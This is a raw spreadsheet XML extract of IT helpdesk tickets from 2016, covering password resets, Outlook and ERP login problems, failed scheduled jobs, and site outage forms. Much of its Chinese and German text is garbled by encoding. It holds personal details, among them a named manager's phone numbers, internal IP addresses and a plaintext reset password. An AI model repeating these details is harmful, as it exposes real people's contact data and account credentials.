_x000D_
===see attachment===_x000D_
-ph: 411_x000D_
-ph:0774430915_x000D_
-</t>
  </si>
  <si>
    <t>hratikvm sbwefglc</t>
  </si>
  <si>
    <t>outlook configuration for new mobile handset</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ckswypji.vrucgqna@gmail.com_x000D_
_x000D_
hi,_x000D_
  request your support to configure settings for outlook mails on my new motorola- moto g4 plus handset._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ckswypji vrucgqna</t>
  </si>
  <si>
    <t>wkzrenmj vsyctbzk</t>
  </si>
  <si>
    <t>not able to login into ethics</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
i am not able to login in ethics portal to complete the course_x000D_
kindly do needful._x000D_
_x000D_
error screen shot attached for reference ._x000D_
_x000D_
[cid:image001.jpg@01d22471.89b858b0]_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>reset passwords for eglavnhx uprodleq using password_management_tool password reset.</t>
  </si>
  <si>
    <t>eglavnhx uprodleq</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrertran failed in job_scheduler at: 10/12/2016 00:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrertran failed in job_scheduler at: 10/12/2016 00:22:00</t>
  </si>
  <si>
    <t>impacts awards login issue</t>
  </si>
  <si>
    <t>ouqzfajm pioneqcg</t>
  </si>
  <si>
    <t>mm:pur_req_ko assign for user: yeyhtung kimthy (vvkuimtyu) SID_34 system</t>
  </si>
  <si>
    <t xml:space="preserve">mm:pur_req_ko assign for user: yeyhtung kimthy (vvkuimtyu) SID_34 system._x000D_
_x000D_
from: alkuozfr bhqgdoiu _x000D_
sent: tuesday, october 11, 2016 4:51 pm_x000D_
to: sudghhahjkkarreddy rangini; dbwkxalj cnhgysju_x000D_
cc: suhtnhdyio psfshytd; seocompanyxv syxewkji; -erp-purchasing; k-hr-global datateam_x000D_
subject: re: ticket_no1543692: erp - additional access_x000D_
_x000D_
this role has been requested and i have approved it numerous times in the past._x000D_
the role is approved._x000D_
_x000D_
this will still not resolve the issue at hand. that issue will deal with the users attributes and possibly with hr org data._x000D_
please loop in the erp:purchasing team and the global hr data team to get this completed._x000D_
hell_x000D_
doug englehart_x000D_
manager global sourcing systems_x000D_
alkuozfr.bhqgdoiu@gmail.com_x000D_
t +1 724 539 5257_x000D_
m +1 724 331 7610_x000D_
f +1 724 539 5744_x000D_
_x000D_
company inc. | 1600 technology way | usa, pa 15650 | www.company.com_x000D_
_x000D_
from: sudghhahjkkarreddy rangini _x000D_
sent: wednesday, september 21, 2016 7:17 am_x000D_
to: alkuozfr bhqgdoiu; dbwkxalj cnhgysju_x000D_
cc: suhtnhdyio psfshytd; seocompanyxv syxewkji_x000D_
subject: re: ticket_no1543692: erp - additional access_x000D_
_x000D_
hi douglas,_x000D_
 _x000D_
below purchase role not assigned to users. _x000D_
_x000D_
is it may the issue? can you please check and if needs to be assign below role to user: seocompanyxv syxewkji (vvkuimtyu) SID_34 system, please provide your approval for the same._x000D_
 _x000D_
role: mm:pur_req_ko_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>user needs help to create delivery.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to check , </t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/11/2016 22:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/11/2016 22:28:00</t>
  </si>
  <si>
    <t>error login on to the mii system.</t>
  </si>
  <si>
    <t>error login on to the mii system._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-unlocked and reset the erp id to"daypay3"._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ikxrlnvu cujyriwh</t>
  </si>
  <si>
    <t>è´¦æˆ·è¢«é”å®š</t>
  </si>
  <si>
    <t>ç”¨æˆ·å¿˜è®°å¯†ç ï¼Œå¯¼è‡´è´¦æˆ·é”å®š</t>
  </si>
  <si>
    <t>neovalui kabpfvic</t>
  </si>
  <si>
    <t>è¾“å…¥ç”¨æˆ·åå’Œå¯†ç åŽæ˜¾ç¤ºå‡ºé”™</t>
  </si>
  <si>
    <t>ç™»å½•æ—¶è¾“å…¥ç”¨æˆ·åå’Œå¯†ç åŽï¼Œæ˜¾ç¤ºç”¨æˆ·åå’Œå¯†ç é”™è¯¯</t>
  </si>
  <si>
    <t>ofiglcaq hvcqtzel</t>
  </si>
  <si>
    <t>HostName_1002 : volume: j:\ label:dat5-HostName_1002 8e944afe on server: HostName_1002 is over 85% space consumed. space available: 1.5</t>
  </si>
  <si>
    <t>HostName_1002 : volume: j:\ label:dat5-HostName_1002 8e944afe on server: HostName_1002 is over 85% space consumed. space available: 1.5 g</t>
  </si>
  <si>
    <t>amssm003  : volume: c:\  94ef9088 on server: is over 85% space consumed. space available: 2.5 g</t>
  </si>
  <si>
    <t>ç”¨æˆ·è´¦æˆ·é”å®šï¼Œè¯·æ±‚è§£é”</t>
  </si>
  <si>
    <t>yvscpgax wdfxytzu</t>
  </si>
  <si>
    <t>advqtkeu uypkfisq</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 10/11/2016 19:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 10/11/2016 19:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">ticket update on inc1559662 </t>
  </si>
  <si>
    <t>ticket update on inplant_868551</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hwrxutgm.fjlwmson@gmail.com
i changed my password through password_management_toolpasswordmanager and when i attempt to logon to erp my password is not recognized.
mthyike voyyhuek
senior materials engineer
hwrxutgm.fjlwmson@gmail.com&lt;mailto:hwrxutgm.fjlwmson@gmail.com&gt;
</t>
  </si>
  <si>
    <t>hwrxutgm fjlwmson</t>
  </si>
  <si>
    <t>äº§å“ä¸Žä»“åº“å¯¹ä¸ä¸Š</t>
  </si>
  <si>
    <t>äº§å“æ‰€åœ¨ä»“åº“å‡ºé”™ã€‚ st6p  -100/+325   æ‰¹å·16-9-16</t>
  </si>
  <si>
    <t>tvykmlex hcawjigf</t>
  </si>
  <si>
    <t>å¼€æœºé»‘å±</t>
  </si>
  <si>
    <t>ç”µè„‘å¯åŠ¨åŽé»‘å±ï¼Œä¸»æœºæ— æŠ¥è­¦</t>
  </si>
  <si>
    <t>outlooké‡å¤è¦æ±‚è¾“å…¥å¯†ç </t>
  </si>
  <si>
    <t>outlookå¯†ç æ¡†åå¤å¼¹å‡ºï¼Œè¦æ±‚è¾“å…¥å¯†ç ï¼Œä¸èƒ½æŽ¥æ”¶é‚®ä»¶</t>
  </si>
  <si>
    <t>jtplaoui uvsihfpn</t>
  </si>
  <si>
    <t>unable to update passwords using password_management_tool link</t>
  </si>
  <si>
    <t>gonflcmq wmptisvz</t>
  </si>
  <si>
    <t>usa's file server not responding, appears to have crashed.</t>
  </si>
  <si>
    <t>qedxiryu mdupjolb</t>
  </si>
  <si>
    <t>ticket update on inplant_868533</t>
  </si>
  <si>
    <t>cannot send email to this customer</t>
  </si>
  <si>
    <t xml:space="preserve">from: rolcgqhx ehndjmlv 
sent: tuesday, october 11, 2016 11:28 am
to:communication &lt;communication@company.com&gt;
subject: help
please let me know why i cannot send email to this customer
best </t>
  </si>
  <si>
    <t>ticket update on ticket_no0448515</t>
  </si>
  <si>
    <t>please reset my pass word for s&amp;op.</t>
  </si>
  <si>
    <t>provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull</t>
  </si>
  <si>
    <t xml:space="preserve">provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull
hello,
could you please provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull?
access like who person name : tyyhtuler hiyhtull [hiyhllt]
manager name/ user id :  vnjwsadx iltywzjm- [fidleyhtjp]
best </t>
  </si>
  <si>
    <t>snkeuizv gsjndfuk</t>
  </si>
  <si>
    <t>unable to take ethics course</t>
  </si>
  <si>
    <t>2nd monitor is bright yellow &amp; gtehdnyu once it warms up.</t>
  </si>
  <si>
    <t>wvtsiucg bfpemgol</t>
  </si>
  <si>
    <t>discount form issue ; infopath</t>
  </si>
  <si>
    <t>szakvjwp imacjlzv</t>
  </si>
  <si>
    <t>prtqi7307 and 7280 malfunction</t>
  </si>
  <si>
    <t>zovfeyjp xflunkim</t>
  </si>
  <si>
    <t>need print to pdf software</t>
  </si>
  <si>
    <t>need adobe professional or any software that has option to print to pdf_x000D_
computer name--lacl7404951</t>
  </si>
  <si>
    <t>user was unable to open reporting_tool</t>
  </si>
  <si>
    <t>mwjcsiug fbwthoca</t>
  </si>
  <si>
    <t xml:space="preserve">the finance_app system is down.  i need someone in the db group to verify that the oracle database  is up and running. </t>
  </si>
  <si>
    <t xml:space="preserve">finance_app system is down.   i need someone in the database admin group to verify that the database hfmp on server HostName_1136 is up and running. </t>
  </si>
  <si>
    <t>ljyfsaox paxockls</t>
  </si>
  <si>
    <t>laptop cannont access companysecure or companyguest wifi in corporate center building</t>
  </si>
  <si>
    <t xml:space="preserve">i recently received a 16gb engineering laptop to use for work. i currently work in the tech. center building where both wired (docked) connection and wifi (company secure) work fine. i have been in two meetings today in the corporate center building where i cannot connect to any secure wifi network. this has been frustrating since i usually require my laptop with internet to some extent in any meeting. please assist. </t>
  </si>
  <si>
    <t>cyber security - phish uacyltoe hxgaycze report october 2016</t>
  </si>
  <si>
    <t>ugyothfz ugrmkdhx</t>
  </si>
  <si>
    <t>cannot access usa or usa collaboration_platform documents</t>
  </si>
  <si>
    <t>when i try to open documents, i am prompted to enter my email address, then password, and then the process repeats. i did change my password today, but don't know if that has anything to do with it.</t>
  </si>
  <si>
    <t>hoqyxkat jbampwtd</t>
  </si>
  <si>
    <t>i get a mysterious java error on every boot of my laptop.</t>
  </si>
  <si>
    <t>qxhdcnmj caflvjrn</t>
  </si>
  <si>
    <t>email</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: raifstow.gfeymtql@gmail.com
i need to have k-rckfthy grind added to my microsoft email.
</t>
  </si>
  <si>
    <t>cannot print on 11x17 paper on new xerox prtqx4602</t>
  </si>
  <si>
    <t>reybfnmc jentcopr</t>
  </si>
  <si>
    <t>password reset and access to reporting_engineering_tools</t>
  </si>
  <si>
    <t>skype meeting issues</t>
  </si>
  <si>
    <t>during skype meetings, i have been unable to use skype calls.  i get the message that my speaker is not working and it will not connect me to audio.  this happened yesterday for one call and then it worked later in the day.  today i have not been able to join via skype.  my same headset works fine for telephone calls, so i do not believe it is my headset.</t>
  </si>
  <si>
    <t>die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administra</t>
  </si>
  <si>
    <t xml:space="preserve">from: lhejbwkc xbmyvnqf _x000D_
sent: tuesday, october 11, 2016 5:48 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: dan fw: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000D_
importance: high_x000D_
_x000D_
dear all_x000D_
_x000D_
please activate my new iphone, it is a company owned device._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">defect scanner/printer "vh42-plant manager/controlling". </t>
  </si>
  <si>
    <t xml:space="preserve">from: byclpwmv esafrtbh 
sent: tuesday, october 11, 2016 7:47 pm
to: nwfodmhc exurcwkm
cc: geoyhtrge wuryhtudack
subject: trurthyuft wg: ticket fÃ¼r drucker
hello help-team,
pls enter a ticket regarding defect scanner/printer "vh42-plant manager/controlling". 
local it is already working on that (with external supplier). 
just to make sure all work is trackedâ€¦
thx
marfhtyio
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>ticket update on ticket_no0447085</t>
  </si>
  <si>
    <t>is there cert open for the usa telephone system outage / disruption?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oxlqvika.zrvbahym@gmail.com_x000D_
_x000D_
it's been down for long distance most of the day â€¦_x000D_
_x000D_
justrgun_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>oxlqvika zrvbahym</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: tuesday, october 11, 2016 6:35 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: rohit request to reset microsoft online services password for wjdatzyv.bhkoldjv@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ wjdatzyv.bhkoldjv@gmail.com 
â€¢ first name: ncoileu 
â€¢ last name: boeyhthm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</si>
  <si>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wjdatzyv bhkoldjv</t>
  </si>
  <si>
    <t>supply_chain_software password reset</t>
  </si>
  <si>
    <t xml:space="preserve">from: ftnijxup sbltduco 
sent: tuesday, october 11, 2016 1:20 am
to: jmxrabzy dpyvjcxr; nwfodmhc exurcwkm
subject: rakthyesh re: finished: start of s&amp;op process
help desk,
please check johthryu's account in supply_chain_software. 
</t>
  </si>
  <si>
    <t>customer  unable to hear user on telephony_software</t>
  </si>
  <si>
    <t>i am signed in to both telephony_software and crm. i am using a soft phone and when the phone rings i select pick up in crm to answer the call and no one can hear me'
telephony_software extension number:-154800 
system name-lfml8517753
call back number-</t>
  </si>
  <si>
    <t>monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_992 &amp; HostName_993</t>
  </si>
  <si>
    <t>monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_993_x000D_
monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_992</t>
  </si>
  <si>
    <t>cydotikj wpvhfijt</t>
  </si>
  <si>
    <t>issue with hr_tool</t>
  </si>
  <si>
    <t>when i try to put in a vacation request in hr_tool, the requests do not show on the calendar.  i need to cancel some dates but they don't show up for me to cancel them.  my supervisor cannot see my requests either</t>
  </si>
  <si>
    <t xml:space="preserve">7350 : audio issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:since outlook crashed yesterday the speakers on 2n1 device do not work. last week a bios upgrade was run to get speakers working again</t>
  </si>
  <si>
    <t xml:space="preserve">outlook issue : crashing and not responding </t>
  </si>
  <si>
    <t>zxobmreq udikorhv</t>
  </si>
  <si>
    <t xml:space="preserve">helped user with crm site and : </t>
  </si>
  <si>
    <t>helped user with crm site and : _x000D_
also helped user with vendor number .</t>
  </si>
  <si>
    <t>ticket update on : ticket_no0447258</t>
  </si>
  <si>
    <t>password_management_tool password manager ?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: itjzudor.ybtmorxp@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
where do i find the password_management_tool password manager ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>itjzudor ybtmorxp</t>
  </si>
  <si>
    <t>vip 2: windows account unlock</t>
  </si>
  <si>
    <t>unable to reply to emails</t>
  </si>
  <si>
    <t>zfburidj jmilguev</t>
  </si>
  <si>
    <t>outlook is unable to connect</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gacfhedw.iqustfzh@gmail.com
hello team,
my outlook is unable to connect to mailserver, this happened just after i renewed my passwords over password_management_tool password manager upon an email notification. i do not have any problems in connecting emails over office 365 web, or in skype business..
could you please take a look?
user: gokcerthy
computer: aisl8111131
</t>
  </si>
  <si>
    <t>gacfhedw iqustfzh</t>
  </si>
  <si>
    <t>iÌ‡lt: outlook is unable to connect</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gacfhedw.iqustfzh@gmail.com
________________________________
gÃ¶nderen: gacfhedw iqustfzh
gÃ¶nderildi: 11 ekim 2016 salÄ± 16:03
kime: nwfodmhc exurcwkm
konu: outlook is unable to connect
hello team,
my outlook is unable to connect to mailserver, this happened just after i renewed my passwords over password_management_tool password manager upon an email notification. i do not have any problems in connecting emails over office 365 web, or in skype business..
could you please take a look?
user: gokcerthy
computer: aisl8111131
</t>
  </si>
  <si>
    <t xml:space="preserve">password_management_tool password manager queries and password reset </t>
  </si>
  <si>
    <t>yctvxumf qnajdofz</t>
  </si>
  <si>
    <t>please provide ip for our 5 users</t>
  </si>
  <si>
    <t xml:space="preserve">å‘ä»¶äºº: white, ben &lt;ben.white@hr_tool.com&gt;
å‘é€æ—¶é—´: 2016å¹´10æœˆ11æ—¥ 9:00:30
æ”¶ä»¶äºº: eva li; dyhtuiel.hiyhugins@company.com; stefyty parkeyhrt
æŠ„é€: haiwei.liang@hr_tool.com; patience, rob
ä¸»é¢˜: re: company intepmov imjukbqhing plan 
hi eva,
can you work with your local it team to determine your desktop ip address and provide it to dyhtuiel and stefyty.
hi dyhtuiel, stefyty,
eva is a miowvyrs qkspyrdm located in the apac office . please check that the routing is in place from her network to connect over the vpn to hr_tool ( 12.161.199.3   to   185.42.190.22 ).
</t>
  </si>
  <si>
    <t>GRP_56</t>
  </si>
  <si>
    <t>unable to open up emails</t>
  </si>
  <si>
    <t>nsoikcyf jhybqael</t>
  </si>
  <si>
    <t>unable to make outbound calls from usa using siemens hiapth 4000</t>
  </si>
  <si>
    <t>pzsvjman podylbmj</t>
  </si>
  <si>
    <t>vip 1 sending email on behalf offinance_vip1</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lpoebzsc.grknswyo@gmail.com
hello â€“ i am a delegate for finance_vip1' email.  i am set up to send emails on behalf of finance_vip1, but when the recipient receives the mail, it says lpoebzsc grknswyo on behalf offinance_vip1.   what i want is for it to just say jk's name, like it had been sent from him.  dtheb mulhylen and othybin graceuyt both have their emails set up that way.
</t>
  </si>
  <si>
    <t>outlook freezes</t>
  </si>
  <si>
    <t>outlook freezes.</t>
  </si>
  <si>
    <t>techruxg wasrvkuz</t>
  </si>
  <si>
    <t>received a message when trying to open a website - "unsupported browser".</t>
  </si>
  <si>
    <t xml:space="preserve">asking me to download a new browser to continue. </t>
  </si>
  <si>
    <t>johthryu's erp inbox is not updating since 6th october.</t>
  </si>
  <si>
    <t>bzxljkoy rvoiqthl</t>
  </si>
  <si>
    <t>getting virus prompt from sep</t>
  </si>
  <si>
    <t xml:space="preserve">getting virus prompt from sep_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nwzhlktu plktredg</t>
  </si>
  <si>
    <t>circuit outage: usa company, mpls router is down since 8:16 am et on 10/11. site is up on vpn circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________8:16 am et on 10/11_____________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ____na___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_______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______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</si>
  <si>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handscanner an pc evhw8114203 bei r208 funktioniert nach tausch immer noch nicht;</t>
  </si>
  <si>
    <t>handscanner an pc evhw8114203 bei r208 funktioniert nach tausch immer noch nicht bitte prÃ¼fen und bei bedarf nochmals tauschen;</t>
  </si>
  <si>
    <t>wg: visio software request</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: przcxbml.vnjdghui@gmail.com_x000D_
_x000D_
hello support team,_x000D_
_x000D_
i need visio on my pc._x000D_
_x000D_
can you please install it?_x000D_
_x000D_
software request approval attached below._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>setup we78 \ewewx200295 \lxfnwyuv bqmjyprz</t>
  </si>
  <si>
    <t>lxfnwyuv bqmjyprz</t>
  </si>
  <si>
    <t>setup we78 \ewew8323646 \lxfnwyuv bqmjyprz</t>
  </si>
  <si>
    <t>momitor defekt \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>hip 10 ersatz- festplatte erstellen!</t>
  </si>
  <si>
    <t>kuemonqi rtexzlvh</t>
  </si>
  <si>
    <t>neuen ordner im info von EU_tool anlegen (please create new folder )</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qavdrpfu.ylfwnbkr@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
bitte im EU_tool unter infos einen neuen pfad anlegen._x000D_
_x000D_
[cid:image001.png@01d223c0.fSID_21c960][cid:image002.jpg@01d223c0.fSID_21c960]_x000D_
_x000D_
[cid:image003.jpg@01d223c0.fSID_21c960]_x000D_
_x000D_
unter impact award ein neues verzeichnis anlegen._x000D_
als bezeichnung bitte erp pm verwenden._x000D_
_x000D_
die dateien zum visualisieren befinden sich auf_x000D_
i:\handbÃ¼cher\erp pm&lt;file:///\\HostName_579\info\handbÃ¼cher\erp%20pm&gt;_x000D_
_x000D_
[cid:image004.jpg@01d223c0.fSID_21c960]_x000D_
_x000D_
reason :_x000D_
[â€Ž10/â€Ž13/â€Ž16 3:19 pm] qavdrpfu ylfwnbkr: _x000D_
i have created some traiyctrhbkm plvnuxmrterial for our shopflor workers for our new erp pm system for creating breakdown notifications_x000D_
so they will have a chance to look into this traiyctrhbkm plvnuxmrterial when they want to do any notification fjaqbgnld yukdzwxs people._x000D_
because we still started with erp pm and our old system was a part of EU_tool_x000D_
called azm._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>qavdrpfu ylfwnbkr</t>
  </si>
  <si>
    <t>s&amp;op password</t>
  </si>
  <si>
    <t xml:space="preserve">help desk,_x000D_
please check stefyty's account in supply_chain_software._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ftnijxup sbltduco</t>
  </si>
  <si>
    <t>replizieren</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: trgqbeax.hfyzudql@gmail.com_x000D_
_x000D_
hallo_x000D_
_x000D_
leider repliziert mein laptop im firmennetz nur rudimentÃ¤r, im iphone bekomme ich die neusten emails. das problem haben auch andere kollegen hier am standort._x000D_
_x000D_
_x000D_
[cid:image001.png@01d223be.6f558640]_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen |  best </t>
  </si>
  <si>
    <t>network outage: engineering_toolkuznetsk warehouse - (company) network is down since 6:28 am et on 10/11.</t>
  </si>
  <si>
    <t>what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___6:28 am et on 10/11.___________________x000D_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_____no_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</si>
  <si>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HostName_1132: oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)</t>
  </si>
  <si>
    <t>HostName_1132:  oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)</t>
  </si>
  <si>
    <t>unable to launch citrix.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to launch citrix. error message atttached.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_505 failed in job_scheduler at: 10/11/2016 05:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_505 failed in job_scheduler at: 10/11/2016 05:43:00</t>
  </si>
  <si>
    <t>crm dynamics - open opportunities from lvdyrqfc pfnmjsok</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ctzykflo.evzbhgru@gmail.com
dear all,
lvdyrqfc pfnmjsok (personnel # 10780975, userid: webyutelc) lost/deleted by mistake his open opportunities (1 week ago).
can someone please check if these open opportunities can be restored.
</t>
  </si>
  <si>
    <t>barcode scanner defekt \paternoster</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/11/2016 04:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/11/2016 04:28:00</t>
  </si>
  <si>
    <t>reset erp password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ztswnaom.lrapiwex@gmail.com
dear admin,
may i request to reset erp password for the following user.
othyoiz
</t>
  </si>
  <si>
    <t>ztswnaom lrapiwex</t>
  </si>
  <si>
    <t>please check jeffrghryey's account in supply_chain_software.</t>
  </si>
  <si>
    <t xml:space="preserve">help desk,_x000D_
please check jeffrghryey's account in supply_chain_software._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>einstellungen am alfa set messgerÃ¤t Ã¼berprÃ¼fen.</t>
  </si>
  <si>
    <t>am rollomatic alfa set messgerÃ¤t mÃ¼ssen die einstellungen laut anleitung Ã¼berprÃ¼ft werden.</t>
  </si>
  <si>
    <t>hwfckjzs abxdmyho</t>
  </si>
  <si>
    <t>reset the password for eglavnhx uprodleq on erp / produktion / erp</t>
  </si>
  <si>
    <t>bitte passwort fÃ¼r benutzer "franhtyuj1" zurÃ¼cksetzten, wurde mehrfach falsch eingegeben._x000D_
danke</t>
  </si>
  <si>
    <t>power outage: india plant - india () telecom_vendor_3 40mbps secondary circuit  is down since 3:26 am et on 10/11/16.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____3:26 am et on 10/11/16._________________x000D_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_yes_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ______yes__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___________    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ______yes_     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    __telecom_vendor_3:#31345563_______________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">po number 5615755997 has been posted gr with incorrect gl account </t>
  </si>
  <si>
    <t>ihfkwzjd erbxoyqk</t>
  </si>
  <si>
    <t>please check brook's account in supply_chain_software</t>
  </si>
  <si>
    <t>passwordproblems</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: agjzikpf.nhfrbxek@gmail.com
hi,
i just tried to change my password via passwordmanager and locked me totally.
would you please be so kind and unlock me again so that i can change it again ?
mit freundlichen grÃ¼ÃŸen
agjzikpf nhfrbxek
analyst logistics
agjzikpf.nhfrbxek@gmail.com&lt;mailto:agjzikpf.nhfrbxek@gmail.com&gt;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</si>
  <si>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agjzikpf nhfrbxek</t>
  </si>
  <si>
    <t>interface 1/0/8 and 1/0/12 are down on switch company-eu-deu-ds-germany-edksw001-3750-core-sw001 since 12:50am et on 10/11</t>
  </si>
  <si>
    <t>circuit outage:germany: company-eu-deu-erkheim-dmvpn-2821-rtr01 is down since 2:09 am et on 10/11/16.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _____x circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _______no__     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __2:09 am et on 10/11/16.____________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000D_
               _x000D_
4.  scheduled maintenance ( network) ? _____no_    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____yes___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</si>
  <si>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eilt !!! monitor defekt </t>
  </si>
  <si>
    <t>monitor defekt _x000D_
fuer hr. tjzohmve wusgaozx_x000D_
_x000D_
neu bau 6 stock, #503</t>
  </si>
  <si>
    <t>qfwnbutk jtenbvkq</t>
  </si>
  <si>
    <t>erp gui login profile missing .</t>
  </si>
  <si>
    <t>erp gui login profile missing . erp cannot login.</t>
  </si>
  <si>
    <t>device does not properly boot up windows - system hangs before user login</t>
  </si>
  <si>
    <t>qkxewzjh outjqilv</t>
  </si>
  <si>
    <t>pls. help to run out dn under sto#5019320060,thx!</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear team,
we got a stock recall notic#plant_101-101016-01 for mm#3098450 &amp; should return 373pc materials to plant_101,then i created sto#5019320060 base on this recall.
dn#916955708/105pc was just created against the sto, pls. help to run out the dn of rest 268pc ,thx a lot!
[cid:image001.png@01d223c2.0ac78080]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 10/11/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 10/11/2016 01:15:00</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
_x000D_
i'm not able to view the attachment of customer 81053386._x000D_
yesterday i received the hourglass only. loging on and off didn't solve the issue._x000D_
today the following message is displaying on the bottom:_x000D_
   javascript:void(0)</t>
  </si>
  <si>
    <t>atlwdyej vtlhzbix</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 10/11/2016 00:02:00  </t>
  </si>
  <si>
